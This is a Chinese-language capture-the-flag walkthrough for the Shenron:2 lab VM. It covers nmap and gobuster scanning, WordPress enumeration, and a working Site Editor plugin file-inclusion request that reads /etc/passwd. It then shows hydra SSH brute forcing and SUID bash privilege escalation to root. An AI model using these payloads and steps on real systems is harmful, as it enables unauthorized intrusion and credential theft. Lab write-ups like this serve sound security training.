Shenron:2
一、基本信息
名称:shenron:2
发布日期:2021.4.5
作者:Shubham mandloi
系列:shenron
推特:@shubhammandloi
二、靶机简介
Flags:
root:/root/root.txt
难度:简单
三、文件信息
文件名:shenron-2.ova
文件大小:3.7GB
下载地址:
MD5: 2883845FF2E1E122E1B1E75CF9A4B4E1
SHA1: E66BDA7AB264D1FEA2103801BB422731F34F0599
四、镜像信息
格式:Virtual Machine (Virtualbox - OVA)
操作系统:Linux(debain)
五、网络信息
DHCP服务:可用
IP地址:自动分配
六、环境配置
1.将靶机shenron2和攻击机kali2021在VirtualBox下设置为桥接模式,使用DHCP分配ip地址:
七、攻略步骤
信息探测
1.因为是没有直接告知我们靶机ip的,所以要先进行主机探测,先查看下kali分配到的ip,在进行网段扫描,命令如下,得到靶机ip为192.168.3.134:
1 ifconfig,查看kali分配到的ip
1 nmap -sP 192.168.3.134/24,扫描靶机ip2.再进行端口扫描,发现只开放22,80及8080端口,访问主页查看源码,没有太多线索:
1 nmap -T4 -sC -sV -p- --min-rate=1000 192.168.3.136 | tee nmapscan,端口扫描3.最后再进行一下目录扫描,没有发现太多值得关注的目录:
1 gobuster dir -u http://192.168.3.136/ -x html,php,bak,txt --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt,目录扫描
Wordpress漏洞利用
1.先把解析写入host,然后访问192.168.3.136:8080,发现是wordpress搭建的页面,可以用wpscan尝试寻找下漏洞:
1 vim /etc/hosts
1 wpscan --url http://shenron:8080 --api-token $(cat /opt/wpscan-api) --enumerate2.发现有Site Editor的漏洞,我们可以看一下如何利用:
1 searchsploit Site Editor 1.1.1
1 curl http://shenron:8080/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd,得到有两个用户和密码hash
SSH密码爆破,初步提权
1.用hydra进行jenny爆破,得到密码登录SSH:
2.在jenny用户下,查看suid,可以发现/usr/bin/Execute,查看文件(需要导入本地查看,不然是elf乱码):
1 find / -type f -perm -u=s 2>/dev/null3.我们可以知道这个文件的作用是将/bin/bash复制到/mnt/bash下,并给予shenron用户权限,那么我们可以利用这个文件:
1
2 Execute
/mnt/bash -p
root提权
1.查看.pass文件,我们能发现一串类似base编码的字符串,利用base32解密发现是shenron用户登录的密码:
2.登录shenron后,查看权限,发现可以直接提权到root:
3.在/root目录下,可以找到flag,即root.txt: